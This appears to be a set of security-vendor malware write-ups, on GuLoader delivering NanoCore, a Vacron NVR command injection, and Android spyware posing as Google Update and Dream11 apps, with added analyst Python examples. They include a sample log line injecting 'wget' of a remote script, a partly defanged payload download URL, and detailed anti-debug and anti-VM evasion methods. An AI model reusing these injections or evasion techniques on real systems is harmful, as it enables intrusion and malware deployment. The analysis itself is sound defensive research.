The obfuscated VBScript contains code broken into variables that are concatenated on execution. The VBScript stores the shellcode in the registry entry HKEY_CURRENT_USER\Software\Fordyred6 (the name varies across variants). A PowerShell script is then executed to read the registry value and continue the infection:

PowerShell Script

The PowerShell script allocates memory inside powershell.exe using the ZwAllocateVirtualMemory API and reads the shellcode data from the registry entry. The shellcode is copied into the allocated memory using RtlMoveMemory and executed inside powershell.exe:

Shellcode

An error window saying “This program cannot be run under virtual environment or debugging software!” appears when the shellcode is executed in a controlled environment. While analyzing the shellcode, a malware researcher should get used to seeing this window again and again, because the shellcode is full of anti-debug and anti-VM techniques:


The initial 0x41 bytes of the shellcode act as a decryptor for the remaining shellcode. The decryption is a XOR operation with a constant value:


After decrypting the remaining shellcode, the decryptor code (the initial 0x41 bytes) is overwritten with 0x90 (NOP instructions) and control is transferred to the decrypted shellcode:


The shellcode uses the PEB traversal method to obtain API addresses, comparing the hashes of exported API names against its own list of hashes. The malware uses a custom DJB2 hashing algorithm to avoid detection by security software: if the standard DJB2 algorithm were used, the DJB2 hashes of the APIs would be identical across malware variants, which makes detection pretty easy for security software:
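The detection argument above is easy to see in code. The following is an added example, not GuLoader’s code: it hashes export names with DJB2, resolves a hash list against a constructed export table the way a PEB-walking loader does, and shows that a signature built from standard DJB2 constants finds nothing once the variant changes the seed, while a loader that knows the variant still resolves its imports. The seed/multiplier parameters only model a “custom” variant; the post does not say what GuLoader actually changed, so the custom seed here is an arbitrary constructed value.

```python
DJB2_SEED = 5381
DJB2_MULT = 33


def djb2(name: bytes, seed: int = DJB2_SEED, mult: int = DJB2_MULT) -> int:
    """DJB2 over an export name, kept to 32 bits like the constants stored in shellcode.
    seed/mult model a 'custom' variant; GuLoader's real tweak is not given in the post (assumption)."""
    h = seed
    for c in name:
        h = (h * mult + c) & 0xFFFFFFFF
    return h


# Constructed export list standing in for the names read while walking the PEB/export tables
# (real ntdll/kernel32 export names, but a hand-picked stand-in rather than a dump).
SAMPLE_EXPORTS = [b"ZwAllocateVirtualMemory", b"RtlMoveMemory", b"NtProtectVirtualMemory",
                  b"LoadLibraryA", b"GetProcAddress", b"VirtualAlloc", b"CreateProcessA"]


def resolve_hashes(wanted, exports, seed: int = DJB2_SEED, mult: int = DJB2_MULT) -> dict:
    """Emulate the loader's lookup: hash every export and match against the wanted hash list.
    Returns {hash: export_name}; hashes that match nothing are left out."""
    table = {djb2(n, seed, mult): n for n in exports}
    return {h: table[h] for h in wanted if h in table}


def build_detection_list(names, seed: int = DJB2_SEED, mult: int = DJB2_MULT) -> set:
    """What a signature author precomputes: the hash constants expected inside samples."""
    return {djb2(n, seed, mult) for n in names}


def embed_hashes(names, seed: int = DJB2_SEED, mult: int = DJB2_MULT) -> bytes:
    """Construct a stand-in shellcode blob: NOP padding around little-endian hash constants."""
    body = b"".join(djb2(n, seed, mult).to_bytes(4, "little") for n in names)
    return b"\x90" * 8 + body + b"\xc3"


def hashes_in_blob(blob: bytes, known: set) -> set:
    """Scan a blob at every byte offset for 32-bit little-endian constants in the known set."""
    return {int.from_bytes(blob[i:i + 4], "little")
            for i in range(len(blob) - 3)
            if int.from_bytes(blob[i:i + 4], "little") in known}


def demo() -> tuple:
    """(hits on a standard-DJB2 blob, hits on a custom-variant blob, names the variant loader resolves)."""
    wanted = [b"ZwAllocateVirtualMemory", b"RtlMoveMemory"]
    signature = build_detection_list(SAMPLE_EXPORTS)   # standard DJB2 constants
    custom_seed = 0x7F3A                                # arbitrary constructed 'custom' seed
    hits_standard = hashes_in_blob(embed_hashes(wanted), signature)
    hits_custom = hashes_in_blob(embed_hashes(wanted, custom_seed), signature)
    resolved = resolve_hashes([djb2(n, custom_seed) for n in wanted], SAMPLE_EXPORTS, custom_seed)
    return len(hits_standard), len(hits_custom), sorted(resolved.values())


if __name__ == "__main__":
    print(demo())
```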


The malware uses various anti-debug and anti-VM techniques. It keeps all its strings encrypted; they are decrypted and used on demand. It encrypts its own code before calling an API and decrypts it again after the call.

Strings Decryption

The malware keeps its strings encrypted and decrypts each one just before using it. A DWORD value stored before each encrypted string is XORed with a constant value to get the string size. The malware contains a decryption key of 0x2B bytes, which is XORed with the encrypted bytes to decrypt the strings:

Anti API Hook

The malware traverses the memory of ntdll.dll starting from the code section and looks for the byte pattern [0xB8, 0x00, ??, ??, 0xBA] to find the code responsible for making system calls. These system call stubs are hooked by many security products to divert control flow into their own code for inspecting API calls. If the system call code has been patched, the malware restores the original bytes:

Anti Dump

The malware encrypts the shellcode just before calling any API, to defeat event-based memory dumps or analysis. After the API returns, the shellcode is decrypted back:

Anti Debug

Software Breakpoints

Before calling an API, the malware checks for software breakpoints by comparing the API's initial byte with 0xCC (INT3) and its initial word with 0x03CD (INT 3) and 0x0B0F (UD2). If any of these breakpoint instructions is found, the malware shows the error window mentioned at the beginning and terminates execution:

Vectored Exception Handler

The malware registers a vectored exception handler with a malware-defined callback that checks for the INT3 (0xCC) exception and computes the next Extended Instruction Pointer (EIP) address by XORing the byte following the current EIP, then continues execution after the exception. When a debugger is attached it handles the INT3 instruction itself, which diverts the control flow onto an incorrect execution path:

Adding this vectored exception handler is an anti-debugging technique in itself, but in this malware it can also be called an irritation technique for researchers, because the code is full of INT3 instructions along with opaque predicates and arithmetic calculations. The researcher either has to bypass each instruction by calculating the next EIP, which is tiring, or write a plugin to bypass them, which is again time consuming:

KUSER_SHARED_DATA

Similar to the user mode GetTickCount API, the kernel mode ZwGetTickCount reads values from the KUSER_SHARED_DATA page. This page is mapped read-only into user mode at address 0x7FFE0000. The malware reads values directly from KUSER_SHARED_DATA before and after executing some instructions and calculates the difference. The difference is calculated multiple times and added to a variable, which is compared against a threshold value to check for a debugging environment. If the computed value does not meet the threshold condition, execution continues in an infinite loop:

DbgBreakPoint

The malware modifies the memory protection of ntdll.dll to PAGE_EXECUTE_READWRITE using the ZwProtectVirtualMemory API and replaces the INT3 instruction inside DbgBreakPoint with a NOP instruction, to prevent a debugger from attaching:

DbgUiRemoteBreakin

The malware replaces the code inside DbgUiRemoteBreakin with a call to the ExitProcess API with exit code 0:

ThreadHideFromDebugger

The malware invokes the ZwSetInformationThread API with the ThreadInformationClass argument set to ThreadHideFromDebugger, which detaches the debugger and, if running under a debugger, terminates the process immediately:

Anti VM

The malware queries virtual memory using the ZwQueryVirtualMemory API and searches for the string “vmtoolsdControlWndClass”; if the string is found, the malware considers itself to be executing in a controlled environment. Whenever the malware finds evidence of running under a virtual environment, it shows the error message window and terminates execution:

CPUID

The malware executes the CPUID instruction with EAX = 1 (processor features) as input and examines the result value in the ECX register. If bit 31 of ECX is set, the malware considers itself to be executing inside a Virtual Machine (VM):

QEMU Emulator

The malware checks for the presence of files related to QEMU emulator:

  • C:\Program Files\Qemu-ga\qemu-ga.exe
  • C:\Program Files\qga\qga.exe

Enumerate Windows

The malware enumerates windows using the EnumWindows API and checks the window count; if the count is less than 0xC, the malware considers itself to be executing in a controlled environment:

Enumerate Device Drivers

The malware retrieves the load addresses of device drivers using the EnumDeviceDrivers API and gets the name associated with each load address using the GetDeviceDriverBaseNameA API. The malware computes the custom DJB2 hash of each device driver name and compares it with its list of hashes:

  • D82B79F9
  • 72FCC347
  • 55C69E11 (vmmouse.sys)
  • 6538B8EE (vmusbmouse.sys)
  • 907D9998
  • 83277DEB (vm3dmp.sys)

Enumerate Installed Software

The malware enumerates installed products using the MsiEnumProductsA API and retrieves each product name using the MsiGetProductInfoA API. The malware computes the custom DJB2 hash of each product name and compares it with its list of hashes:

  • 30565F59
  • E5AB7D36
  • 4F3EA1F6
  • 27D195CB

Enumerate Services

The malware opens the service control manager database using the OpenSCManagerA API and retrieves service names using the EnumServicesStatusA API. The malware computes the custom DJB2 hash of each service name and compares it with its list of hashes:

  • C99647C9
  • ACBC4B26 (VMware Tools)
  • F1D665FC (VMware Snapshot Provider)
  • 82D0D13B
  • 1605A96C
  • CE8609AB
  • 9D86D771

Debug Port

The malware invokes the ZwQueryInformationProcess API with ProcessInformationClass set to ProcessDebugPort. If the API call succeeds, the malware considers itself to be running under a debugger:

Code Injection

The malware creates the process “C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe” in CREATE_SUSPENDED mode. It creates a section and tries to map it into the suspended process at 0x400000, but this fails with 0x40000003 (STATUS_IMAGE_NOT_AT_BASE). The malware then allocates virtual memory in the suspended process using the ZwAllocateVirtualMemory API.

The malware writes the shellcode bytes (0x8D000 bytes) into the suspended process using the ZwWriteVirtualMemory API:

The malware changes the EIP of the suspended process from its entry point to the injected shellcode using the ZwSetContextThread API:

The malware resumes the suspended process using the ZwResumeThread API. The shellcode starts again from the beginning, but now in the context of the new process. It once more executes all the anti-debug and anti-VM techniques, but this time it additionally downloads the payload data:

The malware downloads the encrypted payload from the URL h[t][t]ps://onedrive.live.com/download?cid=5E3278A18A104B1A&resid=5E3278A18A104B1A%21117&authkey=ABLIkl0zjTxzpTk with the user agent set to “Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko”. The download runs in a loop, reading 0x10000 bytes at a time using InternetReadFile until the complete payload data has been downloaded:

The downloaded data begins with 0x40 garbage bytes. Instead of keeping a hardcoded decryption key, the malware computes the key after downloading the encrypted data. The malware contains a constant byte array of size 0x30B. In a loop, it XORs the first word of the constant byte array with the loop index and XORs the result with the word that follows the 0x40 garbage bytes in the downloaded data; if the value comes out as “4D5A”, it breaks out of the loop. The loop index is then XORed with the constant byte array to get the 0x30B-byte decryption key:
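As an added example (not the post's or GuLoader's own code), the key recovery described above written the way an analyst would to unpack a captured download. It assumes the loop index is applied as a little-endian 16-bit word repeated over the 0x30B-byte table and that the payload is a repeating XOR with the resulting key; the constant table and the payload are constructed, not taken from the sample.

```python
# Added example (not from the SonicWall post): recovers the download-stage XOR key
# as the post describes, on constructed data so it runs offline.
import random
import struct

GARBAGE_LEN = 0x40   # leading garbage bytes in the download (from the post)
KEY_LEN = 0x30B      # size of the constant table / derived key (from the post)


def xor_repeat(data: bytes, key: bytes) -> bytes:
    """XOR data with key, repeating the key as needed."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def derive_key(const_table: bytes, downloaded: bytes, max_index: int = 0x10000) -> bytes:
    """Brute-force the loop index as the malware does: the first candidate that turns
    the word after the garbage bytes into 'MZ' wins, and the key is the whole
    constant table XORed with that index."""
    first_word = downloaded[GARBAGE_LEN:GARBAGE_LEN + 2]
    for idx in range(max_index):
        idx_le = struct.pack("<H", idx)          # assumption: 16-bit little-endian index
        candidate = xor_repeat(const_table[:2], idx_le)
        if xor_repeat(first_word, candidate) == b"MZ":
            return xor_repeat(const_table, idx_le)
    raise ValueError("no index yields an MZ header: not a PE payload or a different scheme")


def decrypt_payload(const_table: bytes, downloaded: bytes) -> bytes:
    """Strip the garbage bytes and decrypt the rest (assumed repeating XOR with the key)."""
    return xor_repeat(downloaded[GARBAGE_LEN:], derive_key(const_table, downloaded))


def make_fixture(index: int = 0x1337, seed: int = 7):
    """Constructed download: random table, fake PE body starting with 'MZ', garbage prefix."""
    rng = random.Random(seed)                     # fixed seed so results are reproducible
    const_table = bytes(rng.randrange(256) for _ in range(KEY_LEN))
    payload = b"MZ" + bytes(rng.randrange(256) for _ in range(2000))
    key = xor_repeat(const_table, struct.pack("<H", index))
    garbage = bytes(rng.randrange(256) for _ in range(GARBAGE_LEN))
    return const_table, garbage + xor_repeat(payload, key), payload


if __name__ == "__main__":
    table, blob, original = make_fixture()
    recovered = decrypt_payload(table, blob)
    print("recovered header:", recovered[:2], "matches original:", recovered == original)
```

Because the check only involves the first word, the index is effectively fixed by the constant table and the first two payload bytes, which is why the search always terminates for a PE payload.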

The malware decrypts the payload data using this key; for this variant the payload is the NanoCore RAT. Other variants download AgentTesla, NetWire RAT, Remcos RAT, etc.:

At the time of writing this blog, the file is detected by only a few security vendors on the popular threat intelligence sharing portal VirusTotal, which indicates its spreading potential:

Evidence of the detection by RTDMI(tm) engine can be seen below in the Capture ATP report for this file:

Vacron Network Video Recorder Remote Command Execution

SonicWall Capture Labs threat research team observed attacks exploiting an old vulnerability in Vacron NVR.

Network video recorders (NVRs) are IP-based appliances that are built for managing cameras, recording and viewing camera feeds at a site. NVRs are usually PC-grade or low-end server systems made using commercial off-the-shelf (COTS) hardware components. They typically contain an embedded operating system or a client operating system that hosts video management software, which provides users a mechanism to view, record and manage camera feeds. Vacron sells NVRs as well as other products.

Vacron NVR Remote Command Execution Vulnerability

The goal of a command injection attack is the execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application.

The remote Vacron network video recorder is affected by a remote command execution vulnerability due to improper sanitization of user-supplied input passed via /board.cgi.

Following are some of the exploits found in the wild:

As one can see, the vulnerable /board.cgi does not properly sanitize its input. This allows the attacker to inject and execute commands that change the directory and download a malicious script from an attacker-controlled server.
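As an added example on the defender's side (not from the post), a small check that scans web access-log lines for /board.cgi requests whose query carries shell metacharacters or a download tool, the pattern described above. The log lines, IP addresses and the `board=` parameter name are constructed placeholders, since the post does not show the exploit request itself.

```python
# Added example (not from the SonicWall post): flag /board.cgi requests in access logs
# that look like command injection (shell separators plus a download tool).
import re
from urllib.parse import unquote_plus

# Sequences that let injected input start a second shell command. A single '&' is a
# legitimate query-string separator, so only '&&' is treated as a shell chain here.
SHELL_METACHARS = re.compile(r"[;|`]|&&|\$\(|\n")
# Tools associated with the follow-on download of a malicious script.
DOWNLOAD_TOOLS = re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.IGNORECASE)
# Common-log-format request field: "METHOD /path?query HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def inspect_line(line: str):
    """Return (reason, decoded_target) for a suspicious /board.cgi request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = unquote_plus(m.group("target"))  # decode %3B, '+', etc. before matching
    path, _, query = target.partition("?")
    if not path.endswith("/board.cgi") or not query:
        return None
    reasons = []
    if SHELL_METACHARS.search(query):
        reasons.append("shell metacharacter in query")
    if DOWNLOAD_TOOLS.search(query):
        reasons.append("download tool in query")
    return (", ".join(reasons), target) if reasons else None


def scan_log(lines):
    """Return [(line_number, (reason, target)), ...] for every suspicious line."""
    hits = []
    for number, line in enumerate(lines, 1):
        result = inspect_line(line)
        if result:
            hits.append((number, result))
    return hits


# Constructed sample log (not real traffic): 198.51.100.x are documentation-reserved
# addresses and "board=" is a hypothetical parameter name.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2021:10:00:00 +0000] "GET /board.cgi?board=1 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2021:10:00:01 +0000] "GET /board.cgi?board=1%3Bcd%20/tmp%3Bwget%20http://198.51.100.9/x.sh HTTP/1.1" 200 12',
    '198.51.100.8 - - [01/Jan/2021:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for number, (reason, target) in scan_log(SAMPLE_LOG):
        print(f"line {number}: {reason}: {target}")
```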

SonicWall Capture Labs provides protection against this threat via following signatures:

      • IPS 13033: Vacron NVR Remote Command Execution
      • GAV: Linux.Mirai.N_2

IoCs

    • 222.138.188.211
    • 103.181.56.61
    • 125.44.20.51
    • 175.107.0.212
    • 3a43d007ed5ff84d4b71f96a49c88fe0061a2a9651935a82d4acbf55982fc370

Threat Graph

Android Malware impersonates Google Update Application with old traits

SonicWall Capture Labs Threats Research team has been regularly sharing information about malware, including spyware, targeting Android devices. SonicWall has tracked down a huge number of fake applications disguised as legitimate Google Update applications.

Fig 1. Fake Google Update applications

A new version of the spyware recently appeared on malware-sharing platforms like VirusTotal.

Fig 2. VirusTotal submission history

Infection Cycle:

Most of the fake malicious Google updater apps have the common activities of spyware, and a few of them work as banking trojans as well.

After installation, the apps ask for Accessibility permission and then hide from the app drawer.

Fig 3: App Installation & Accessibility permission

It accesses the following data on the device, and the tracked information is saved in a corresponding .json file. It then establishes a socket connection with the C&C server “help.domainoutlet.site” and shares the device information as a JSON file.

  • SMS
  • Call logs
  • Call Recording
  • Device Info
  • Location
  • Keyloggers
  • Device Contact
  • Notification

Fig 4: Storing contact details in JSON file

In some cases, along with the spyware activities, it also acts as a banking trojan, for example the sample with SHA-256 fb3837dc602c3f51939891b75a34d706bbefa73f822cffffeb1b863a6526bf95.

A Dex file containing the malicious banking trojan code is loaded dynamically.

Fig 5: Load Dex file

It checks the installed applications and compares them against a list of specific package names, mostly banking and cryptocurrency apps (350+ apps). Once it determines that one of these apps is in use, it can carry out an overlay attack: it places a fake page that looks similar to the legitimate app over it, in order to steal credentials.

Fig 6: Checking installed apps

Fig 7: Load WebView for overlay attack

Fig 8: List of targeted apps

SonicWall Capture Labs provides protection against this threat via the SonicWall Capture ATP w/RTDMI.

Indicators of Compromise (IOC):

Info Stealers are leveraging betting apps ban over Google Play store

SonicWall Capture Labs Threats Research team has been regularly sharing information about malware threats targeting Android devices. Recently we have observed some fake fantasy league betting applications in the wild.

The Google Play store banned all gambling and sports betting applications, but since March 2021, following an update to its policies, the ban on online gaming has been lifted in 19 countries, while in the remaining places these apps use external third-party platforms.

In India, more than 25 fantasy apps are available; the most popular, named “Dream11”, has a download count of more than 130 million according to its official website.

As these apps are not present in the Google Play store, malware authors are leveraging this fact to host fake malicious apps that look like the genuine ones.

Infection cycle:

Once installed on the device, the fake Dream11 application uses the following icons:

Fig 1: Malicious App icon

Fig 2: Showing the correct match schedule

Once executed, it displays a page showing the match schedule, as in Figure 2 above; however, the app does not respond after this page. During our static investigation, we observed that it performs several malicious activities:

  • Receives commands via SMS
  • Reads and sends SMS
  • Reads and deletes contacts
  • Accesses call log (incoming, outgoing & missed calls)
  • Tracks location
  • Records audio
  • Logs keystrokes
  • Camera Access

Fig 3: Reads SMS and Executes command accordingly

Fig 4: Commands Received

Fig 5: Sent SMS

Fig 6: Call log Access

Fig 7: Deletes contact details

Fig 8: Audio record

Fig 9: Access device Location

Fig 10: Config file

Fig 11: Sending user info using socket connection

We urge our users to always be vigilant and cautious when installing software programs particularly if you are not certain of the source.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: AndroidOS.Fakeapp.FL

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Indicators of Compromise (IOC):

2ecd9211817021f8a3f3e1f4ad0bf1b7a98b0d82

0a55255e35390f3fed3cd333e0873f0054ff7827